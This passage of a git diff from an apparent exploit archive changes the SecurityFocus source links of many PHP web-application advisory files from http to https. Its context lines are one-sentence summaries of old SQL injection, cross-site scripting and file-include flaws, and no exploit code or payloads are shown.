vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25602.txt b/exploits/php/webapps/25602.txt index b5c18005f..dc282829a 100644 --- a/exploits/php/webapps/25602.txt +++ b/exploits/php/webapps/25602.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13499/info +source: https://www.securityfocus.com/bid/13499/info FishCart is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25603.txt b/exploits/php/webapps/25603.txt index 2441d86bd..33a652edf 100644 --- a/exploits/php/webapps/25603.txt +++ b/exploits/php/webapps/25603.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13499/info +source: https://www.securityfocus.com/bid/13499/info FishCart is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25604.txt b/exploits/php/webapps/25604.txt index 8f1f54e78..f3ac94383 100644 --- a/exploits/php/webapps/25604.txt +++ b/exploits/php/webapps/25604.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13499/info +source: https://www.securityfocus.com/bid/13499/info FishCart is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25612.txt b/exploits/php/webapps/25612.txt index 398775e71..9e1e26d1a 100644 --- a/exploits/php/webapps/25612.txt +++ b/exploits/php/webapps/25612.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13507/info +source: https://www.securityfocus.com/bid/13507/info myBloggie is affected by multiple vulnerabilities. diff --git a/exploits/php/webapps/25614.txt b/exploits/php/webapps/25614.txt index d0f270e21..0d0547931 100644 --- a/exploits/php/webapps/25614.txt +++ b/exploits/php/webapps/25614.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13512/info +source: https://www.securityfocus.com/bid/13512/info MidiCart PHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25615.txt b/exploits/php/webapps/25615.txt index d8bb61a00..f35a8f188 100644 --- a/exploits/php/webapps/25615.txt +++ b/exploits/php/webapps/25615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13513/info +source: https://www.securityfocus.com/bid/13513/info MidiCart PHP is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25616.txt b/exploits/php/webapps/25616.txt index 4a23f3877..7018e1d91 100644 --- a/exploits/php/webapps/25616.txt +++ b/exploits/php/webapps/25616.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13514/info +source: https://www.securityfocus.com/bid/13514/info MidiCart PHP is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25617.txt b/exploits/php/webapps/25617.txt index 6e79301ff..f77007424 100644 --- a/exploits/php/webapps/25617.txt +++ b/exploits/php/webapps/25617.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13515/info +source: https://www.securityfocus.com/bid/13515/info MidiCart PHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25618.txt b/exploits/php/webapps/25618.txt index c986df7f5..c38db8e8b 100644 --- a/exploits/php/webapps/25618.txt +++ b/exploits/php/webapps/25618.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13516/info +source: https://www.securityfocus.com/bid/13516/info MidiCart PHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25619.txt b/exploits/php/webapps/25619.txt index e4c68ffd3..e05a9cab0 100644 --- a/exploits/php/webapps/25619.txt +++ b/exploits/php/webapps/25619.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13517/info +source: https://www.securityfocus.com/bid/13517/info MidiCart PHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25620.txt b/exploits/php/webapps/25620.txt index db4f86a52..dd6279e82 100644 --- a/exploits/php/webapps/25620.txt +++ b/exploits/php/webapps/25620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13518/info +source: https://www.securityfocus.com/bid/13518/info MidiCart PHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25623.txt b/exploits/php/webapps/25623.txt index 3af49b1eb..d8f007827 100644 --- a/exploits/php/webapps/25623.txt +++ b/exploits/php/webapps/25623.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13533/info +source: https://www.securityfocus.com/bid/13533/info CJ Ultra Plus is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/25630.txt b/exploits/php/webapps/25630.txt index a219d1ba2..5a00d417c 100644 --- a/exploits/php/webapps/25630.txt +++ b/exploits/php/webapps/25630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13548/info +source: https://www.securityfocus.com/bid/13548/info Advanced Guestbook is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25635.txt b/exploits/php/webapps/25635.txt index a37d880c8..fff5521f3 100644 --- a/exploits/php/webapps/25635.txt +++ b/exploits/php/webapps/25635.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13557/info +source: https://www.securityfocus.com/bid/13557/info PHP Nuke is prone to an input validation vulnerability. Reports indicate the script fails to correctly identify potentially dangerous characters when the characters are double hex-encoded (i.e. %25%41 == %41 == A). diff --git a/exploits/php/webapps/25637.txt b/exploits/php/webapps/25637.txt index 3925fd05a..ba6e03e47 100644 --- a/exploits/php/webapps/25637.txt +++ b/exploits/php/webapps/25637.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13560/info +source: https://www.securityfocus.com/bid/13560/info CodeThatShoppingCart is reportedly affected by multiple input validation vulnerabilities. These issues may allow remote attackers to carry out cross-site scripting and SQL injection attacks. An attacker may also potentially disclose sensitive data. diff --git a/exploits/php/webapps/25638.txt b/exploits/php/webapps/25638.txt index 99ac9203a..1609596b3 100644 --- a/exploits/php/webapps/25638.txt +++ b/exploits/php/webapps/25638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13560/info +source: https://www.securityfocus.com/bid/13560/info CodeThatShoppingCart is reportedly affected by multiple input validation vulnerabilities. These issues may allow remote attackers to carry out cross-site scripting and SQL injection attacks. An attacker may also potentially disclose sensitive data. diff --git a/exploits/php/webapps/25639.txt b/exploits/php/webapps/25639.txt index a235c4fed..4acf3c691 100644 --- a/exploits/php/webapps/25639.txt +++ b/exploits/php/webapps/25639.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13561/info +source: https://www.securityfocus.com/bid/13561/info PwsPHP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25640.txt b/exploits/php/webapps/25640.txt index cb322df59..35b527e10 100644 --- a/exploits/php/webapps/25640.txt +++ b/exploits/php/webapps/25640.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13563/info +source: https://www.securityfocus.com/bid/13563/info PwsPHP is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25641.txt b/exploits/php/webapps/25641.txt index 9f9279b5b..00ee055e0 100644 --- a/exploits/php/webapps/25641.txt +++ b/exploits/php/webapps/25641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13569/info +source: https://www.securityfocus.com/bid/13569/info WowBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to using it in an SQL query. diff --git a/exploits/php/webapps/25642.txt b/exploits/php/webapps/25642.txt index 2ad50f0d7..e931622bc 100644 --- a/exploits/php/webapps/25642.txt +++ b/exploits/php/webapps/25642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13570/info +source: https://www.securityfocus.com/bid/13570/info NukeET is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25644.txt b/exploits/php/webapps/25644.txt index 8954d79e5..c5c0cc897 100644 --- a/exploits/php/webapps/25644.txt +++ b/exploits/php/webapps/25644.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13573/info +source: https://www.securityfocus.com/bid/13573/info e107 Website System is prone to a directory traversal vulnerability. This issue could be exploited to obtain the contents of arbitrary files on the vulnerable computer. diff --git a/exploits/php/webapps/25645.txt b/exploits/php/webapps/25645.txt index 086fee2a6..93bb1cd95 100644 --- a/exploits/php/webapps/25645.txt +++ b/exploits/php/webapps/25645.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13576/info +source: https://www.securityfocus.com/bid/13576/info e107 Website System is prone to an SQL injection vulnerability. This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. diff --git a/exploits/php/webapps/25650.txt b/exploits/php/webapps/25650.txt index f17c54ba5..05fb79646 100644 --- a/exploits/php/webapps/25650.txt +++ b/exploits/php/webapps/25650.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13599/info +source: https://www.securityfocus.com/bid/13599/info Quick.Cart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25653.txt b/exploits/php/webapps/25653.txt index 6eda15835..6cd74a7aa 100644 --- a/exploits/php/webapps/25653.txt +++ b/exploits/php/webapps/25653.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13608/info +source: https://www.securityfocus.com/bid/13608/info DirectTopics is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25654.txt b/exploits/php/webapps/25654.txt index 10ae08752..025e3db7b 100644 --- a/exploits/php/webapps/25654.txt +++ b/exploits/php/webapps/25654.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13621/info +source: https://www.securityfocus.com/bid/13621/info Ultimate PHP Board is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25655.txt b/exploits/php/webapps/25655.txt index 34120a18f..b771643c2 100644 --- a/exploits/php/webapps/25655.txt +++ b/exploits/php/webapps/25655.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13622/info +source: https://www.securityfocus.com/bid/13622/info Ultimate PHP Board is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25656.txt b/exploits/php/webapps/25656.txt index f14636929..fa545247f 100644 --- a/exploits/php/webapps/25656.txt +++ b/exploits/php/webapps/25656.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13624/info +source: https://www.securityfocus.com/bid/13624/info OpenBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25657.txt b/exploits/php/webapps/25657.txt index eed38ff2d..7669ebfb3 100644 --- a/exploits/php/webapps/25657.txt +++ b/exploits/php/webapps/25657.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13625/info +source: https://www.securityfocus.com/bid/13625/info OpenBB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25659.txt b/exploits/php/webapps/25659.txt index 3b879da34..5e945fb7e 100644 --- a/exploits/php/webapps/25659.txt +++ b/exploits/php/webapps/25659.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13627/info +source: https://www.securityfocus.com/bid/13627/info phpMyChat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25660.txt b/exploits/php/webapps/25660.txt index 9c11286a8..34bf42b73 100644 --- a/exploits/php/webapps/25660.txt +++ b/exploits/php/webapps/25660.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13628/info +source: https://www.securityfocus.com/bid/13628/info phpMyChat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25662.txt b/exploits/php/webapps/25662.txt index ef8ab441d..9ecf857a7 100644 --- a/exploits/php/webapps/25662.txt +++ b/exploits/php/webapps/25662.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13632/info +source: https://www.securityfocus.com/bid/13632/info Skull-Splitter Guestbook is prone to multiple HTML injection vulnerabilities. It is possible to inject HTML and script code into the title and content of posted messages. diff --git a/exploits/php/webapps/25663.txt b/exploits/php/webapps/25663.txt index 65f4dce9b..4a179ee8d 100644 --- a/exploits/php/webapps/25663.txt +++ b/exploits/php/webapps/25663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13633/info +source: https://www.securityfocus.com/bid/13633/info Shop-Script is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25664.txt b/exploits/php/webapps/25664.txt index a098febfc..ca48c61e8 100644 --- a/exploits/php/webapps/25664.txt +++ b/exploits/php/webapps/25664.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13635/info +source: https://www.securityfocus.com/bid/13635/info Shop-Script is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25665.txt b/exploits/php/webapps/25665.txt index 47a3a5976..bd404dfb7 100644 --- a/exploits/php/webapps/25665.txt +++ b/exploits/php/webapps/25665.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13636/info +source: https://www.securityfocus.com/bid/13636/info PostNuke Blocks module is affected by a directory traversal vulnerability. diff --git a/exploits/php/webapps/25671.txt b/exploits/php/webapps/25671.txt index 6cd3d48aa..ef80fbc84 100644 --- a/exploits/php/webapps/25671.txt +++ b/exploits/php/webapps/25671.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13649/info +source: https://www.securityfocus.com/bid/13649/info NPDS is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/25672.txt b/exploits/php/webapps/25672.txt index 992474305..0ee496959 100644 --- a/exploits/php/webapps/25672.txt +++ b/exploits/php/webapps/25672.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13649/info +source: https://www.securityfocus.com/bid/13649/info NPDS is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/25673.txt b/exploits/php/webapps/25673.txt index af65b42a5..615285dbd 100644 --- a/exploits/php/webapps/25673.txt +++ b/exploits/php/webapps/25673.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13650/info +source: https://www.securityfocus.com/bid/13650/info JGS-Portal is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25674.txt b/exploits/php/webapps/25674.txt index fda412fdc..2cf756a86 100644 --- a/exploits/php/webapps/25674.txt +++ b/exploits/php/webapps/25674.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13650/info +source: https://www.securityfocus.com/bid/13650/info JGS-Portal is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25675.txt b/exploits/php/webapps/25675.txt index f6205247a..93f327b7c 100644 --- a/exploits/php/webapps/25675.txt +++ b/exploits/php/webapps/25675.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13650/info +source: https://www.securityfocus.com/bid/13650/info JGS-Portal is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25676.txt b/exploits/php/webapps/25676.txt index ed16d406b..9cea36aeb 100644 --- a/exploits/php/webapps/25676.txt +++ b/exploits/php/webapps/25676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13650/info +source: https://www.securityfocus.com/bid/13650/info JGS-Portal is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25677.txt b/exploits/php/webapps/25677.txt index 6df7524a8..a6d3e02de 100644 --- a/exploits/php/webapps/25677.txt +++ b/exploits/php/webapps/25677.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13650/info +source: https://www.securityfocus.com/bid/13650/info JGS-Portal is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25678.txt b/exploits/php/webapps/25678.txt index d29d5b509..127b83a6f 100644 --- a/exploits/php/webapps/25678.txt +++ b/exploits/php/webapps/25678.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13650/info +source: https://www.securityfocus.com/bid/13650/info JGS-Portal is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25679.txt b/exploits/php/webapps/25679.txt index 90da2ad42..9013ef277 100644 --- a/exploits/php/webapps/25679.txt +++ b/exploits/php/webapps/25679.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13650/info +source: https://www.securityfocus.com/bid/13650/info JGS-Portal is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25681.php b/exploits/php/webapps/25681.php index d5f0bef77..9bb2b927f 100644 --- a/exploits/php/webapps/25681.php +++ b/exploits/php/webapps/25681.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13661/info +source: https://www.securityfocus.com/bid/13661/info FusionPHP Fusion News is prone to a remote PHP code injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. This may facilitate unauthorized access. diff --git a/exploits/php/webapps/25682.txt b/exploits/php/webapps/25682.txt index 6a2c9e8bb..a26301f7f 100644 --- a/exploits/php/webapps/25682.txt +++ b/exploits/php/webapps/25682.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13663/info +source: https://www.securityfocus.com/bid/13663/info Wordpress is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25683.txt b/exploits/php/webapps/25683.txt index 332c646f8..7f1db1322 100644 --- a/exploits/php/webapps/25683.txt +++ b/exploits/php/webapps/25683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13666/info +source: https://www.securityfocus.com/bid/13666/info Help Center Live is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25686.txt b/exploits/php/webapps/25686.txt index 889804029..83f63d17d 100644 --- a/exploits/php/webapps/25686.txt +++ b/exploits/php/webapps/25686.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13691/info +source: https://www.securityfocus.com/bid/13691/info PHP Advanced Transfer Manager is prone to an arbitrary file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25689.txt b/exploits/php/webapps/25689.txt index ffc1c70a6..0dece07b0 100644 --- a/exploits/php/webapps/25689.txt +++ b/exploits/php/webapps/25689.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13700/info +source: https://www.securityfocus.com/bid/13700/info TOPo is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25690.pl b/exploits/php/webapps/25690.pl index 710223d32..61b80be5f 100755 --- a/exploits/php/webapps/25690.pl +++ b/exploits/php/webapps/25690.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13708/info +source: https://www.securityfocus.com/bid/13708/info PortailPHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25693.txt b/exploits/php/webapps/25693.txt index 71c6903d7..32c6403b2 100644 --- a/exploits/php/webapps/25693.txt +++ b/exploits/php/webapps/25693.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13716/info +source: https://www.securityfocus.com/bid/13716/info GForge is affected by a remote command execution vulnerability. diff --git a/exploits/php/webapps/25704.txt b/exploits/php/webapps/25704.txt index 34402844e..39358f6e4 100644 --- a/exploits/php/webapps/25704.txt +++ b/exploits/php/webapps/25704.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13760/info +source: https://www.securityfocus.com/bid/13760/info PHP Poll Creator is affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25727.txt b/exploits/php/webapps/25727.txt index e63825cad..703684c15 100644 --- a/exploits/php/webapps/25727.txt +++ b/exploits/php/webapps/25727.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25728.txt b/exploits/php/webapps/25728.txt index 52de90b75..c1ce99d96 100644 --- a/exploits/php/webapps/25728.txt +++ b/exploits/php/webapps/25728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25729.txt b/exploits/php/webapps/25729.txt index 4cc13f3fe..e472da2b2 100644 --- a/exploits/php/webapps/25729.txt +++ b/exploits/php/webapps/25729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25730.txt b/exploits/php/webapps/25730.txt index 864696549..e5ab1d790 100644 --- a/exploits/php/webapps/25730.txt +++ b/exploits/php/webapps/25730.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25731.txt b/exploits/php/webapps/25731.txt index d9ef4f5de..4e89e28a1 100644 --- a/exploits/php/webapps/25731.txt +++ b/exploits/php/webapps/25731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25732.txt b/exploits/php/webapps/25732.txt index dd7b9afb4..071f29a92 100644 --- a/exploits/php/webapps/25732.txt +++ b/exploits/php/webapps/25732.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25733.txt b/exploits/php/webapps/25733.txt index a7212a923..8d8da6cea 100644 --- a/exploits/php/webapps/25733.txt +++ b/exploits/php/webapps/25733.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25734.txt b/exploits/php/webapps/25734.txt index ac94dc756..abc0d7b0f 100644 --- a/exploits/php/webapps/25734.txt +++ b/exploits/php/webapps/25734.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25735.txt b/exploits/php/webapps/25735.txt index 58302d709..7ef27903d 100644 --- a/exploits/php/webapps/25735.txt +++ b/exploits/php/webapps/25735.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25740.txt b/exploits/php/webapps/25740.txt index 7ad1a88b2..b2b249e84 100644 --- a/exploits/php/webapps/25740.txt +++ b/exploits/php/webapps/25740.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13796/info +source: https://www.securityfocus.com/bid/13796/info JAWS is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25741.bat b/exploits/php/webapps/25741.bat index d9df449ea..ebd805861 100644 --- a/exploits/php/webapps/25741.bat +++ b/exploits/php/webapps/25741.bat @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13802/info +source: https://www.securityfocus.com/bid/13802/info Invision Power Board is affected by an unauthorized access vulnerability. diff --git a/exploits/php/webapps/25742.txt b/exploits/php/webapps/25742.txt index a938fcddb..9cdfa63fa 100644 --- a/exploits/php/webapps/25742.txt +++ b/exploits/php/webapps/25742.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25743.txt b/exploits/php/webapps/25743.txt index 5157c8902..7cd572019 100644 --- a/exploits/php/webapps/25743.txt +++ b/exploits/php/webapps/25743.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25744.txt b/exploits/php/webapps/25744.txt index f6743d41c..1dd89f494 100644 --- a/exploits/php/webapps/25744.txt +++ b/exploits/php/webapps/25744.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25745.txt b/exploits/php/webapps/25745.txt index cc2dc1f55..7ace4604e 100644 --- a/exploits/php/webapps/25745.txt +++ b/exploits/php/webapps/25745.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25746.txt b/exploits/php/webapps/25746.txt index e5bb88b7e..6c66a95c7 100644 --- a/exploits/php/webapps/25746.txt +++ b/exploits/php/webapps/25746.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25747.txt b/exploits/php/webapps/25747.txt index 80572251d..079daec56 100644 --- a/exploits/php/webapps/25747.txt +++ b/exploits/php/webapps/25747.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25748.txt b/exploits/php/webapps/25748.txt index c52af363f..96864f1f7 100644 --- a/exploits/php/webapps/25748.txt +++ b/exploits/php/webapps/25748.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25749.txt b/exploits/php/webapps/25749.txt index 3c14e0366..844f68c07 100644 --- a/exploits/php/webapps/25749.txt +++ b/exploits/php/webapps/25749.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25750.txt b/exploits/php/webapps/25750.txt index 2d9bccc70..bbfcab264 100644 --- a/exploits/php/webapps/25750.txt +++ b/exploits/php/webapps/25750.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25756.txt b/exploits/php/webapps/25756.txt index c01ee0547..fb123a9b1 100644 --- a/exploits/php/webapps/25756.txt +++ b/exploits/php/webapps/25756.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13812/info +source: https://www.securityfocus.com/bid/13812/info India Software Solution Shopping Cart is prone to an SQL injection 